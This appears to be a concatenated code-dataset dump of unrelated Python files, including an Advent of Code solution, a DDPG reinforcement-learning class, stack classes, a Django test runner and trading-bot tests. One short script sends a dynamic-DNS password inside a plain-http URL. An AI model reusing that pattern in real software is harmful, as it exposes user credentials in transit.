tracking. The default value is MODEL.
numDesignCycles
An Int specifying the number of design cycles permitted when *stepSize* is DYNAMIC. The
default value is 15.
numFulfilledStopCriteria
An Int specifying the number of stop criteria. The default value is 2.
numTrackedModes
An Int specifying the number of modes included in mode tracking. The default value is 5.
objectiveFunctionDeltaStopCriteria
A Float specifying the stop criteria based on the change in objective function. The
default value is 10–3.
region
The SymbolicConstant MODEL or a Region object specifying the region to which the
optimization task is applied. The default value is MODEL.
softDeletionMethod
A SymbolicConstant specifying the method used when *softDeletionRegion* is specified.
The STANDARD method avoids creating disconnected regions. The AGGRESSIVE method only
considers the *softDeletionThreshold*. The MAX_SHEAR_STRAIN, MAX_ELASTOPLASTIC_STRAIN
and VOLUME_COMPRESSION methods do not need the *softDeletionRadius*. Possible values are
STANDARD, AGGRESSIVE, MAX_SHEAR_STRAIN, MIN_PRINCIPAL_STRAIN, MAX_ELASTOPLASTIC_STRAIN
and VOLUME_COMPRESSION. The default value is STANDARD.
softDeletionRadius
A Float specifying the radius to use when considering neighboring soft elements to
delete. The default value is 0.0.
softDeletionRegion
None or a Region object specifying the region in which the soft elements should be
deleted during optimization. The default value is None.
softDeletionThreshold
A Float specifying the relative material density value used to identify soft elements.
Those with values below the threshold are considered for removal. For STANDARD and
AGGRESSIVE methods positive values are accepted and the default value is 0.05. For
MAX_SHEAR_STRAIN and MAX_ELASTOPLASTIC_STRAIN methods positive values are accepted
whereas for MIN_PRINCIPAL_STRAIN and VOLUME_COMPRESSION methods negative values are
accepted.
stepSize
A SymbolicConstant specifying the size of the increment for volume modification.
Possible values are DYNAMIC, VERY_SMALL, SMALL, MODERATE, MEDIUM, and LARGE. The default
value is MEDIUM.
stiffnessMassDamping
The SymbolicConstant AVERAGE_EDGE_LENGTH or a Float specifying the stiffness mass
damping for the task region. The default value is AVERAGE_EDGE_LENGTH.
stopCriteriaDesignCycle
An Int specifying the first design cycle used to evaluate convergence criteria. The
default value is 4.
structuralMassDamping
None or a Float specifying the structural mass damping for the task region. The default
value is None.
viscousMassDamping
None or a Float specifying the viscous mass damping for the task region. The default
value is None.
viscousStiffnessDamping
None or a Float specifying the viscous stiffness damping for the task region. The
default value is None.
groupOperator
A Boolean specifying whether the group in the design response will be evaluated using
the existing algorithm or a new algorithm based on Abaqus sensitivities. The default
value of False means that the existing algorithm will be used.
Returns
-------
A TopologyTask object.
"""
self.optimizationTasks[name] = optimizationTask = TopologyTask(name, abaqusSensitivities, algorithm,
densityMoveLimit, densityUpdateStrategy,
elementDensityDeltaStopCriteria, filterRadius,
firstCycleDeletedVolume,
firstCycleDeletedVolumeTechnique,
freezeBoundaryConditionRegions,
freezeLoadRegions, frequencySpectrumWeight,
initialDensity, materialInterpolationPenalty,
materialInterpolationTechnique, maxDensity,
minDensity, modeTrackingRegion, numDesignCycles,
numFulfilledStopCriteria, numTrackedModes,
objectiveFunctionDeltaStopCriteria, region,
softDeletionMethod, softDeletionRadius,
softDeletionRegion, softDeletionThreshold,
stepSize, stiffnessMassDamping,
stopCriteriaDesignCycle, structuralMassDamping,
viscousMassDamping, viscousStiffnessDamping,
groupOperator)
return optimizationTask
| StarcoderdataPython |
4801130 | # vi: set shiftwidth=4 tabstop=4 expandtab:
import datetime
import collections
import itertools
def get_adapters_from_file(file_path="../../resources/year2020_day10_input.txt"):
with open(file_path) as f:
return [int(l) for l in f]
def get_jolt_differences(adapters):
adapters = [0] + sorted(adapters) + [max(adapters) + 3]
return collections.Counter(ad2 - ad1 for ad1, ad2 in zip(adapters, adapters[1:]))
def get_nb_charging_arrangements(adapters):
adapters = [0] + sorted(adapters)
nb_arr = []
for i, ad in enumerate(adapters):
nb = 0 if i else 1
for idx in range(max(0, i - 3), i):
if adapters[idx] + 3 >= ad:
nb += nb_arr[idx]
nb_arr.append(nb)
return nb_arr[-1]
def run_tests():
example1 = [16, 10, 15, 5, 1, 11, 7, 19, 6, 12, 4]
example2 = [
28,
33,
18,
42,
31,
14,
46,
20,
48,
47,
24,
23,
49,
45,
19,
38,
39,
11,
1,
32,
25,
35,
8,
17,
7,
9,
4,
2,
34,
10,
3,
]
jolt_diff = get_jolt_differences(example1)
assert jolt_diff[1] * jolt_diff[3] == 35
jolt_diff = get_jolt_differences(example2)
assert jolt_diff[1] * jolt_diff[3] == 220
assert get_nb_charging_arrangements(example1) == 8
assert get_nb_charging_arrangements(example2) == 19208
def get_solutions():
adapters = get_adapters_from_file()
jolt_diff = get_jolt_differences(adapters)
print(jolt_diff[1] * jolt_diff[3] == 1656)
print(get_nb_charging_arrangements(adapters) == 56693912375296)
if __name__ == "__main__":
begin = datetime.datetime.now()
run_tests()
get_solutions()
end = datetime.datetime.now()
print(end - begin)
| StarcoderdataPython |
3287463 | import sys
import requests
import time
def update_record(username, password):
url = 'http://' + username + ':' + password + '@dyn.dns.he.net/nic/update?hostname=' + username
try:
r = requests.get(url)
print(r.status_code)
except requests.RequestException as e:
print(e)
if __name__ == '__main__':
your_domain = str(sys.argv[1])
your_domain_key = str(sys.argv[2])
while True:
update_record(your_domain, your_domain_key)
time.sleep(600)
| StarcoderdataPython |
8119 | import numpy as np
import torch
from torch.nn import functional as F
from rltoolkit.acm.off_policy import AcMOffPolicy
from rltoolkit.algorithms import DDPG
from rltoolkit.algorithms.ddpg.models import Actor, Critic
class DDPG_AcM(AcMOffPolicy, DDPG):
def __init__(
self, unbiased_update: bool = False, custom_loss: float = 0.0,
custom_loss_target: float = 0.0, custom_loss_lr: float = 0.0001,
refill_buffer: bool = False,
lagrangian_custom_loss: bool = False, separate_custom_loss: bool = False,
cw_cl_targets: list = None, custom_loss_target_decay: int = None,
custom_loss_target_dfactor: float = None,
*args, **kwargs,
):
f"""DDPG with AcM class
Args:
unbiased_update (bool, optional): Use next_obs as action for update.
Defaults to { False }.
refill_buffer (bool, optional): if buffer should be refilled with new observations, when its full
Defaults to {False}
"""
super().__init__(*args, **kwargs)
self.unbiased_update = unbiased_update
self.actor = Actor(
self.ob_dim, ac_lim=self.actor_ac_lim, ac_dim=self.actor_output_dim
)
if not self.acm_critic:
self.critic = Critic(self.ob_dim, ac_dim=self.actor_output_dim)
self.custom_loss = custom_loss
custom_loss_scaled = np.log(np.exp(custom_loss) - 1)
self.custom_loss_param = torch.tensor(custom_loss_scaled) if not separate_custom_loss else torch.Tensor([custom_loss_scaled] * self.actor_output_dim)
self.custom_loss_param.requires_grad = lagrangian_custom_loss
self.custom_loss_target = custom_loss_target
self.cw_cl_targets = cw_cl_targets
if lagrangian_custom_loss and cw_cl_targets:
self.custom_loss_target = cw_cl_targets
self.lagrangian_custom_loss = lagrangian_custom_loss
self.custom_loss_lr = custom_loss_lr
self.separate_custom_loss = separate_custom_loss
self.custom_loss_optimizer = self.opt([self.custom_loss_param], lr=custom_loss_lr)
self.refill_buffer = refill_buffer
self.custom_loss_target_decay = custom_loss_target_decay
self.custom_loss_target_dfactor = custom_loss_target_dfactor
if self.custom_loss:
self.loss["ddpg"] = 0.0
self.loss["dist"] = 0.0
if lagrangian_custom_loss:
if self.separate_custom_loss:
self.distances = []
for i in range(self.actor_output_dim):
self.loss[f"custom_loss_param/{i}"] = 0.0
else:
self.loss["custom_loss_param"] = 0.0
new_hparams = {
"hparams/unbiased_update": self.unbiased_update,
"hparams/custom_loss": self.custom_loss,
"hparams/lagrangian_cl": self.lagrangian_custom_loss,
"hparams/custom_loss_target_decay": self.custom_loss_target_decay,
"hparams/custom_loss_target_dfactor": self.custom_loss_target_dfactor,
}
if self.lagrangian_custom_loss:
if self.cw_cl_targets is None:
new_hparams["hparams/cl_target"] = self.custom_loss_target
new_hparams["hparams/cl_lr"] = self.custom_loss_lr
self.hparams_acm.update(new_hparams)
self.hparams.update(self.hparams_acm)
def noise_action(self, obs, act_noise, deterministic=False):
action, _ = self._actor.act(obs, deterministic)
noise = act_noise * torch.randn(self.actor_output_dim, device=self.device)
action += noise * self.actor_ac_lim
action = np.clip(
action.cpu(), -1.1 * self.actor_ac_lim.cpu(), 1.1 * self.actor_ac_lim.cpu()
)
action = action.to(self.device)
if self.denormalize_actor_out:
action = self.replay_buffer.denormalize(action, self.acm_ob_idx)
return action
def custom_loss_target_decay_condition(self):
return(
self.custom_loss_target_decay is not None
and self.custom_loss_target_dfactor is not None
and self.iterations > 0
and self.stats_logger.frames % self.custom_loss_target_decay == 0
)
def acm_update_condition(self):
return (
self.iteration > 0
and self.acm_epochs > 0
and self.stats_logger.frames % self.acm_update_freq == 0
)
def make_unbiased_update(self):
if self.update_condition():
for _ in range(self.grad_steps):
batch = self.replay_buffer.sample_batch(
self.update_batch_size, self.device
)
obs, next_obs, _, reward, done, acm_action = batch
self.update(
obs=obs,
next_obs=next_obs,
action=next_obs,
reward=reward,
done=done,
acm_action=acm_action,
)
def make_update(self):
if self.unbiased_update:
self.make_unbiased_update()
else:
super().make_update()
if self.custom_loss_target_decay_condition():
self.custom_loss_target *= self.custom_loss_target_dfactor
print(f"CUSTOM LOSS TARTGET DECAY, CURRENT VALUE {self.custom_loss_target}")
if self.acm_update_condition():
if self.acm_update_batches:
self.update_acm_batches(self.acm_update_batches)
else:
self.update_acm(self.acm_epochs)
def collect_params_dict(self):
params_dict = super().collect_params_dict()
params_dict["acm"] = self.acm.state_dict()
return params_dict
def apply_params_dict(self, params_dict):
super().apply_params_dict(params_dict)
self.acm.load_state_dict(params_dict["acm"])
def save_model(self, save_path=None):
save_path = DDPG.save_model(self, save_path)
torch.save(self.acm.state_dict(), save_path + "_acm_model.pt")
def compute_qfunc_targ(
self, reward: torch.Tensor, next_obs: torch.Tensor, done: torch.Tensor
):
"""Compute targets for Q-functions
Args:
reward (torch.Tensor): batch of rewards
next_obs (torch.Tensor): batch of next observations
done (torch.Tensor): batch of done
Returns:
torch.Tensor: Q-function targets for the batch
"""
with torch.no_grad():
next_action, _ = self.actor_targ(next_obs)
next_action = self.replay_buffer.denormalize(next_action, self.acm_ob_idx)
if self.acm_critic:
acm_obs = torch.cat([next_obs, next_action], axis=1)
next_action = self.acm(acm_obs)
q_target = self.critic_targ(next_obs, next_action)
qfunc_target = reward + self.gamma * (1 - done) * q_target
return qfunc_target
def add_custom_loss(self, loss, action, denorm_action, next_obs):
if self.custom_loss:
self.loss["ddpg"] = loss.item()
if self.norm_closs:
next_obs = self.replay_buffer.normalize(next_obs, force=True)
else:
action = denorm_action
if not self.separate_custom_loss:
loss_dist = F.mse_loss(action, self.cut_obs(next_obs))
self.loss["dist"] = loss_dist.item()
if self.lagrangian_custom_loss:
loss += F.softplus(self.custom_loss_param) * (loss_dist - self.custom_loss_target)
else:
loss += self.custom_loss * loss_dist
if self.custom_loss_target_decay is not None:
self.loss["custom_loss_target"] = self.custom_loss_target
else:
distances = torch.mean(F.mse_loss(action, self.cut_obs(next_obs), reduction='none'), dim=0)
if self.cw_cl_targets is None:
loss += torch.sum(F.softplus(self.custom_loss_param) * (distances - self.custom_loss_target))
else:
loss += torch.sum(F.softplus(self.custom_loss_param) * (distances - torch.Tensor(self.custom_loss_target)))
self.loss["dist"] = distances.detach()
if self.debug_mode:
for j in range(distances.shape[0]):
self.loss[f"dist/cw/{j}"] = distances[j]
return loss
def compute_pi_loss(self, obs, next_obs):
action, _ = self._actor(obs)
denorm_action = self.replay_buffer.denormalize(action, self.acm_ob_idx)
if self.acm_critic:
acm_obs = torch.cat([obs, denorm_action], axis=1)
critic_action = self.acm(acm_obs)
else:
critic_action = denorm_action
loss = -self._critic(obs, critic_action).mean()
return self.add_custom_loss(loss, action, denorm_action, next_obs)
def update_custom_loss_param_loss(self):
if not self.lagrangian_custom_loss:
return
dist_loss = self.loss["dist"]
if self.cw_cl_targets is None:
loss = -F.softplus(self.custom_loss_param) * (dist_loss - self.custom_loss_target)
else:
loss = -F.softplus(self.custom_loss_param) * (dist_loss - torch.Tensor(self.custom_loss_target))
if self.separate_custom_loss:
for i in range(len(loss)):
self.loss[f"custom_loss_param/{i}"] = loss[i].item()
self.loss["dist"] = torch.mean(self.loss["dist"]).item()
loss = torch.sum(loss)
else:
self.loss["custom_loss_param"] = loss.item()
self.custom_loss_optimizer.zero_grad()
loss.backward()
self.custom_loss_optimizer.step()
def copy_offline_dataset(self, dataset, size):
"""copies the provided offlineRL dataset into the replay buffer.
for the moment assumes D4RL dataset format (a dictionary)
and copies elements one-by-one
"""
i = 0
traj = 0
while i < size:
traj += 1
done = torch.tensor(dataset['timeouts'][i] or dataset['terminals'][i])
obs = torch.tensor(dataset['observations'][i])
prev_idx = self.replay_buffer.add_obs(obs)
i += 1
ep_len = 0
while(not done and i < size):
nextobs = torch.tensor(dataset['observations'][i])
rew = torch.tensor( dataset['rewards'][i] )
done = torch.tensor( dataset['timeouts'][i] or dataset['terminals'][i] )
action = torch.tensor( dataset['actions'][i] )
end = torch.tensor( dataset['terminals'][i] )
next_idx = self.replay_buffer.add_obs(nextobs)
self.replay_buffer.add_timestep(
prev_idx, next_idx, nextobs, rew, done, end
)
self.replay_buffer.add_acm_action(action)
prev_idx = next_idx
i += 1
ep_len += 1
print(f"copied offline dataset with {i} samples, contains {traj} trajectories")
#sets the internal variables according to the provided offline dataset
self.acm_pre_train_samples = i
self.buffer_size = i
self.max_frames = i
self.iterations = i / self.steps_per_epoch
#updates std/dev/min/max parameters of the dataset
self.update_obs_mean_std(self.replay_buffer)
def collect_batch_and_train(self, steps_per_epoch: int, *args, **kwargs):
"""SPP variant of rollouts and collect samples if there is enough samples
in replay buffer use existing samples to perform actor/critic update
otherwise generate new samples till steps_per_epoch number of steps
will be added to the replay buffer
Args:
steps_per_epoch (int): number of samples to collect and train
*args, **kwargs: arguments for make_update
"""
collected = 0
while collected < steps_per_epoch:
# important part,
# when the replay buffer is filled stop generating new frames, just use the existing buffer
# such that the number of used experience in learning is counted correctly
if (self.stats_logger.frames >= self.buffer_size - self.acm_pre_train_samples) and not self.refill_buffer:
self.stats_logger.frames += 1
collected += 1
self.make_update(*args, **kwargs)
continue
self.stats_logger.rollouts += 1
obs = self.env.reset()
# end - end of the episode from perspective of the simulation
# done - end of the episode from perspective of the model
end = False
obs = self.process_obs(obs)
prev_idx = self.replay_buffer.add_obs(obs)
ep_len = 0
while not end:
obs = self.replay_buffer.normalize(obs)
if (self.stats_logger.frames > self.acm_pre_train_samples) and (self.stats_logger.frames <= self.acm_pre_train_samples + self.random_frames):
action = self.initial_act(obs)
else:
action = self.noise_action(obs, self.act_noise)
action_proc = self.process_action(action, obs)
prev_obs = obs
obs, rew, done, _ = self.env.step(action_proc)
ep_len += 1
end = True if ep_len == self.max_ep_len else done
done = False if ep_len == self.max_ep_len else done
obs = self.process_obs(obs)
if self.next_obs_diff is not None:
obs = self.compute_next_obs_diff(prev_obs, obs)
next_idx = self.replay_buffer.add_obs(obs)
self.replay_buffer.add_timestep(
prev_idx, next_idx, action, rew, done, end
)
prev_idx = next_idx
self.stats_logger.frames += 1
collected += 1
self.make_update(*args, **kwargs)
def update(
self,
obs: torch.Tensor,
next_obs: torch.Tensor,
action: torch.Tensor,
reward: torch.Tensor,
done: torch.Tensor,
acm_action: torch.Tensor,
):
"""DDPG update step
Args:
obs (torch.Tensor): observations tensor
next_obs (torch.Tensor): next observations tensor
action (torch.Tensor): actions tensor
reward (torch.Tensor): rewards tensor
done (torch.Tensor): dones tensor
acm_action (torch.Tensor): tensor of acm actions
"""
for param in self.acm.parameters():
param.requires_grad = False
if self.acm_critic:
action = acm_action
y = self.compute_qfunc_targ(reward, next_obs, done)
# Update Q-function by one step
y_q = self._critic(obs, action)
loss_q = F.mse_loss(y_q, y)
self.loss["critic"] = loss_q.item()
self.critic_optimizer.zero_grad()
loss_q.backward()
self.critic_optimizer.step()
# Update policy by one step
self._critic.eval()
loss = self.compute_pi_loss(obs, next_obs)
self.loss["actor"] = loss.item()
self.actor_optimizer.zero_grad()
loss.backward()
self.actor_optimizer.step()
#update temperature of Lagrangian optimization obj
self.update_custom_loss_param_loss()
# Update target networks
self.update_target_nets()
self._critic.train()
for param in self.acm.parameters():
param.requires_grad = True
def add_tensorboard_logs(self, buffer, done):
super().add_tensorboard_logs(buffer, done)
if self.lagrangian_custom_loss:
self.tensorboard_writer.log_custom_loss_param(
self.iteration, self.custom_loss_param)
if __name__ == "__main__":
#with torch.cuda.device(0):
model = DDPG_AcM(
# unbiased_update=True,
# custom_loss=True,
# acm_update_batches=50,
# denormalize_actor_out=True,
env_name="Pendulum-v0",
buffer_size=50000,
act_noise=0.05,
iterations=100,
gamma=0.99,
steps_per_epoch=200,
stats_freq=5,
test_episodes=3,
custom_loss=1,
lagrangian_custom_loss=False,
# tensorboard_dir="logs_ddpg",
# tensorboard_comment="",
acm_update_freq=200,
acm_epochs=1,
acm_pre_train_epochs=10,
acm_pre_train_samples=10000,
use_gpu=False,
render=False,
)
model.pre_train()
model.train()
| StarcoderdataPython |
3256503 | #!python
from linkedlist import LinkedList
# Implement LinkedStack below, then change the assignment at the bottom
# to use this Stack implementation to verify it passes all tests
class LinkedStack(object):
def __init__(self, iterable=None):
"""Initialize this stack and push the given items, if any."""
# Initialize a new linked list to store the items
self.list = LinkedList()
if iterable is not None:
for item in iterable:
self.push(item)
def __repr__(self):
"""Return a string representation of this stack."""
return 'Stack({} items, top={})'.format(self.length(), self.peek())
def is_empty(self):
"""Return True if this stack is empty, or False otherwise."""
return False if self.list.head else True
def length(self):
"""Return the number of items in this stack."""
return self.list.size
def push(self, item):
"""Insert the given item on the top of this stack.
Running time: O(1) beacuase adding an item to the
front of a linked list is just changing pointers
which takes O(1) time"""
self.list.prepend(item)
def peek(self):
"""Return the item on the top of this stack without removing it,
or None if this stack is empty."""
return self.list.head.data if self.list.head else None
def pop(self):
"""Remove and return the item on the top of this stack,
or raise ValueError if this stack is empty.
Running time: O(1) because removing a item form the front
of a linked list is just changing pointers which
takes O(1) time"""
if self.is_empty():
raise ValueError('Stack is empty')
item = self.list.head.data
self.list.delete(item)
return item
# Implement ArrayStack below, then change the assignment at the bottom
# to use this Stack implementation to verify it passes all tests
class ArrayStack(object):
def __init__(self, iterable=None):
"""Initialize this stack and push the given items, if any."""
# Initialize a new list (dynamic array) to store the items
self.list = list()
if iterable is not None:
for item in iterable:
self.push(item)
def __repr__(self):
"""Return a string representation of this stack."""
return 'Stack({} items, top={})'.format(self.length(), self.peek())
def is_empty(self):
"""Return True if this stack is empty, or False otherwise."""
return True if len(self.list) == 0 else False
def length(self):
"""Return the number of items in this stack."""
return len(self.list)
def push(self, item):
"""Insert the given item on the top of this stack.
Running time: O(1) because appending to a list
(dynamic array) is setting a pointer to a new value
(exept when we need to find more space for array) which
takes O(1) time"""
self.list.append(item)
def peek(self):
"""Return the item on the top of this stack without removing it,
or None if this stack is empty."""
return self.list[len(self.list)-1] if len(self.list) > 0 else None
def pop(self):
"""Remove and return the item on the top of this stack,
or raise ValueError if this stack is empty.
Running time: O(1) because the built in list pop method
removes the last item in the list and since python list
are dynamic and indexing is O(1) it takes O(1) time to
remove the last item"""
if self.is_empty():
raise ValueError('Stack is empty')
return self.list.pop()
# Implement LinkedStack and ArrayStack above, then change the assignment below
# to use each of your Stack implementations to verify they each pass all tests
Stack = LinkedStack
# Stack = ArrayStack
| StarcoderdataPython |
4818592 | # -*- coding: utf-8 -*-
import os, sys
from django.conf import settings
from django.core.management import call_command
DIRNAME = os.path.dirname(__file__)
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(DIRNAME, 'database.db'),
}
}
settings.configure(DEBUG = True,
DATABASES=DATABASES,
USE_TZ=True,
SNOWSHOESTAMP_KEY='12345678910111213141516171819201234567891011121314151617181920',
SNOWSHOESTAMP_SECRET='bananamonkeygorillachimp',
ROOT_URLCONF='snowshoestamp.urls',
PASSWORD_HASHERS=('django.contrib.auth.hashers.MD5PasswordHasher',), # simple fast hasher but not secure
INSTALLED_APPS = ('django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'snowshoestamp',))
from django.test.simple import DjangoTestSuiteRunner
call_command('syncdb', interactive=False)
failures = DjangoTestSuiteRunner().run_tests(['snowshoestamp',], verbosity=1)
if failures:
sys.exit(failures) | StarcoderdataPython |
35474 | <reponame>joepatmckenna/normal_forms
from normal_forms import normal_form
import sympy
# Murdock, Normal Forms and Unfoldings of Local Dynamical Systems, Example 4.5.24
def f(x, y, z):
f1 = 6 * x + x**2 + x * y + x * z + y**2 + y * z + z**2
f2 = 2 * y + x**2 + x * y + x * z + y**2 + y * z + z**2
f3 = 3 * z + x**2 + x * y + x * z + y**2 + y * z + z**2
return f1, f2, f3
h = normal_form(f, (0, 0, 0), 2)
# coeff of z**2
print h.fun[0].coeff(h.jet.var[2]**2)
| StarcoderdataPython |
1687068 | <filename>python/npcomp/tracing/emitters.py
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
import numpy as np
from collections import namedtuple
from enum import Enum
class Protocol(Enum):
UFUNC = 1
ARRAY_FUNC = 2
class TraceValueType(Enum):
NDARRAY = 1
class TraceValue(
namedtuple("TraceValue", ["value", "type"],
defaults=(TraceValueType.NDARRAY,))):
__slots__ = ()
"""A Python value and the trace type that it should correspond to."""
class TraceInvocation(
namedtuple("TraceInvocation", ["inputs", "kwargs", "protocol", "method"],
defaults=(Protocol.ARRAY_FUNC, "__call__"))):
"""An invocation of a single functions.
This abstracts over both ufuncs and array_funcs, differentiating by the
protocol and method.
"""
__slots__ = ()
class EmissionRequest(
namedtuple("EmissionRequest",
["input_ssa_values", "dialect_helper", "extra"],
defaults=(None,))):
"""Represents the result of processing inputs from an invocation.
The `input_ssa_values` are mlir.ir.Value instances corresponding to
input_trace_values in TraceValueMap.
The `extra` value is only relevant to the producer and can be used as a
blackbox mechanism to transfer un-tracked state from an invocation to
emission.
The `dialect_helper` fields correspond to mlir.ir.DialectHelper.
"""
__slots__ = ()
class TraceValueMap(
namedtuple("TraceValueMap",
["input_trace_values", "result_trace_value_types", "extra"],
defaults=(None,))):
"""The result of mapping an invocation to corresponding op structure.
This type associates:
- Python (object, TraceValueType) representing invocation inputs that
correspond to SSA values in the IR.
- TraceValueTypes that are the expected logical result types from the
invocation.
- 'extra' object that is passed to followon Emitter methods.
"""
__slots__ = ()
class FuncEmitter:
"""An emitter for an op-like function invocation."""
def map_invocation(self, trace_invocation: TraceInvocation) -> TraceValueMap:
"""Maps from an invocation to EmissionRequest.
This hook is also responsible for validating the invocation and should
raise appropriate user-visible exceptions (i.e. when invoked with incorrect
arguments).
This hook is used to prepare for emission in a define-by-run scenario.
Static emission from an AST needs to be prepared via another mechanism.
Args:
trace_invocation: An Invocation instance to map.
Returns:
A TraceValueMap describing the structure of the invocation as mapped
to/from IR.
"""
raise NotImplementedError()
def map_results(self, py_results, extra):
"""Maps a list of python results to actual function return values.
Args:
py_results: List of python results corresponding to the emitted op
results.
extra: The extra object returned by map_invocation.
Returns:
Actual function result. Typically this requires special handling to
unpack the result of functions that return 1 item.
"""
raise NotImplementedError()
def emit(self, request: EmissionRequest):
"""Emits IR using the provided ops and types factories.
Args:
emission_inputs: An EmissionRequest produced by tracing each TraceValue
from a previous call to map_invocation and the corresponding extra
value.
Returns:
An iterable of mlir.ir.Value instances representing the outputs of the
operation. The `builder` on `ops` must be positioned to consume these
values.
"""
raise NotImplementedError()
class GenericCallUfuncEmitter(FuncEmitter):
"""A FuncEmitter for generic ufuncs requiring no special behavior.
Representation:
>>> emitter = GenericCallUfuncEmitter("numpy.add")
>>> emitter
<ufunc emitter 'numpy.add'>
>>> inv = TraceInvocation([1, 2], {}, protocol=Protocol.UFUNC)
>>> inputs = emitter.map_invocation(inv)
>>> inputs
TraceValueMap(input_trace_values=[TraceValue(value=1, type=<TraceValueType.NDARRAY: 1>), TraceValue(value=2, type=<TraceValueType.NDARRAY: 1>)], result_trace_value_types=[<TraceValueType.NDARRAY: 1>], extra=None)
Error on unsupported kwargs:
>>> inv = TraceInvocation([1, 2], {"foobar": 1}, protocol=Protocol.UFUNC)
>>> emitter.map_invocation(inv)
Traceback (most recent call last):
...
ValueError: Unexpected keyword args for ufunc numpy.add: foobar
"""
__slots__ = ("_ufunc_name")
def __init__(self, ufunc_name: str):
self._ufunc_name = ufunc_name
def __repr__(self):
return "<ufunc emitter '%s'>" % self._ufunc_name
def map_invocation(self,
trace_invocation: TraceInvocation) -> EmissionRequest:
assert trace_invocation.protocol == Protocol.UFUNC
assert trace_invocation.method == "__call__"
if trace_invocation.kwargs:
raise ValueError(
"Unexpected keyword args for ufunc %s: %s" %
(self._ufunc_name, ", ".join(trace_invocation.kwargs.keys())))
# Without above special cases, any positional args map to emission
# inputs.
return TraceValueMap([
TraceValue(i, TraceValueType.NDARRAY) for i in trace_invocation.inputs
], [TraceValueType.NDARRAY],
extra=None)
def map_results(self, py_results, extra):
# Ufuncs always return one result, so just unpack it.
return py_results[0]
def emit(self, request: EmissionRequest):
h = request.dialect_helper
op_result_type = h.tensor_type(h.numpy_any_dtype)
call_op = h.numpy_builtin_ufunc_call_op(*request.input_ssa_values,
qualified_name=self._ufunc_name,
result_type=op_result_type)
return call_op.results
class GenericArrayFuncEmitter(FuncEmitter):
"""Emitter for array funcs that don't do anything 'special'."""
__slots__ = ("_op_name", "_nresults")
def __init__(self, op_name: str, nresults: int = 1):
self._op_name = op_name
self._nresults = nresults
def __repr__(self):
return "<array_func emitter '%s'>" % self._op_name
def map_invocation(self,
trace_invocation: TraceInvocation) -> EmissionRequest:
assert trace_invocation.protocol == Protocol.ARRAY_FUNC
if trace_invocation.method != "__call__":
raise NotImplementedError("Only __call__ is supported for %s (got '%s')" %
(
self._op_name,
trace_invocation.method,
))
if trace_invocation.kwargs:
raise ValueError(
"Unexpected keyword args for %s: %s" %
(self._op_name, ", ".join(trace_invocation.kwargs.keys())))
# Without above special cases, any positional args map to emission
# inputs.
return TraceValueMap([
TraceValue(i, TraceValueType.NDARRAY) for i in trace_invocation.inputs
], [TraceValueType.NDARRAY] * self._nresults,
extra=None)
def map_results(self, py_results, extra):
if self._nresults == 1:
return py_results[0]
else:
return tuple(py_results)
def emit(self, request: EmissionRequest):
h = request.dialect_helper
op_result_types = [h.tensor_type(h.numpy_any_dtype)] * self._nresults
op = h.op(self._op_name, op_result_types, request.input_ssa_values)
return op.results
class EmitterRegistry:
"""Registry of known Emitter instances mapped to source function.
>>> r = EmitterRegistry.create_default()
>>> r.lookup_ufunc(np.add, "__call__")
<ufunc emitter 'numpy.add'>
>>> r.lookup_array_func(np.dot)
<array_func emitter 'numpy.dot'>
"""
def __init__(self):
self._ufunc_map = {} # Dictionary of (f, method) -> Emitter
self._arrayfunc_map = {} # Dictionary of f -> Emitter
@classmethod
def create_default(cls):
registry = cls()
registry.register_defaults()
return registry
def register_ufunc(self, ufunc, method, emitter):
# Last registration wins.
self._ufunc_map[(ufunc, method)] = emitter
def register_array_func(self, f, emitter):
# Last registration wins.
self._arrayfunc_map[f] = emitter
def lookup_ufunc(self, ufunc, method):
return self._ufunc_map.get((ufunc, method))
def lookup_array_func(self, f):
return self._arrayfunc_map.get(f)
def register_defaults(self):
# Find all ufuncs in the numpy module and register by name.
for member in sorted(dir(np)):
ufunc = getattr(np, member)
if isinstance(ufunc, np.ufunc):
self.register_ufunc(ufunc, "__call__",
GenericCallUfuncEmitter("numpy." + member))
# Register generic 1-result array funcs.
GENERIC_FUNCS = (
(np.inner, "numpy.inner"),
(np.outer, "numpy.outer"),
(np.dot, "numpy.dot"),
(np.vdot, "numpy.vdot"),
(np.linalg.det, "numpy.linalg.det"),
# TODO: This needs a custom implementation to differentiate when
# axes is specified (this version will fail).
(np.transpose, "numpy.transpose"),
)
for f, op_name in GENERIC_FUNCS:
self.register_array_func(f, GenericArrayFuncEmitter(op_name))
if __name__ == "__main__":
import doctest
doctest.testmod()
| StarcoderdataPython |
3392062 | # Builtins
import unittest
import time
# Submodule imports
from harvest.trader import *
from harvest.algo import BaseAlgo
from harvest.api.dummy import DummyStreamer
from harvest.api.paper import PaperBroker
from harvest.api.yahoo import YahooStreamer
# from harvest.api.robinhood import Robinhood
import datetime as dt
import pandas as pd
from harvest.definitions import *
from harvest.utils import gen_data
from _util import *
class TestLiveTrader(unittest.TestCase):
def test_no_streamer_no_broker(self):
"""
If no streamer or broker is specified, LiveTrader should default to Yahoo Streamer and Paper Broker
"""
trader = LiveTrader()
self.assertEqual(trader.streamer_str, "yahoo")
self.assertEqual(trader.broker_str, "paper")
def test_no_streamer_rh_broker(self):
"""
If no streamer is specified but a broker is set, and the broker can be used as a streamer
(which is almost always the case), LiveTrader should use the broker as the streamer
"""
trader = LiveTrader(broker="robinhood")
self.assertEqual(trader.streamer_str, "robinhood")
self.assertEqual(trader.broker_str, "robinhood")
def test_no_streamer_paper_broker(self):
"""
If no streamer is specified but a paper broker is set,
LiveTrader should use the yahoo broker as the streamer
"""
trader = LiveTrader(broker="paper")
self.assertEqual(trader.streamer_str, "yahoo")
self.assertEqual(trader.broker_str, "paper")
def test_yahoo_streamer_no_broker(self):
"""
If a streamer is specified but no broker, LiveTrader should default to use Paper Broker
"""
trader = LiveTrader(streamer="robinhood")
self.assertEqual(trader.streamer_str, "robinhood")
self.assertEqual(trader.broker_str, "paper")
trader_yh = LiveTrader(streamer="yahoo")
self.assertEqual(trader_yh.streamer_str, "yahoo")
self.assertEqual(trader_yh.broker_str, "paper")
def test_broker_sync(self):
"""
Test that the broker is synced with the streamer
"""
trader, dummy, paper = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
# Add positions to the paper broker
def test_trader_adding_symbol(self):
t = PaperTrader(DummyStreamer())
t.set_symbol("A")
